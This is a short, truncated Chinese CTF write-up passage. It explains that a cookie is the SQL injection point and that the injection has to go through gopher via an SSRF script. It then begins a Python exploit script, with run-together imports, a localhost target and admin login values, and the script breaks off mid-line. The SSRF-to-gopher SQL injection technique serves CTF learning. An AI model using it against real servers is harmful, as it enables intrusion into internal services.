返回数据包有set-cookie,但是这种ctf要什么cookie呢,看别人wp,cookie是注入点。 bp抓包扔进sqlmap×,因为是gopher协议带进去注入,所以再用一次ssrf脚本√.带上cookie importurllib.parseimportrequestsimporttimeimportbase64 host ="127.0.0.1:80"content ="uname=admin&passwd=admin"content_length =len(content) paylo...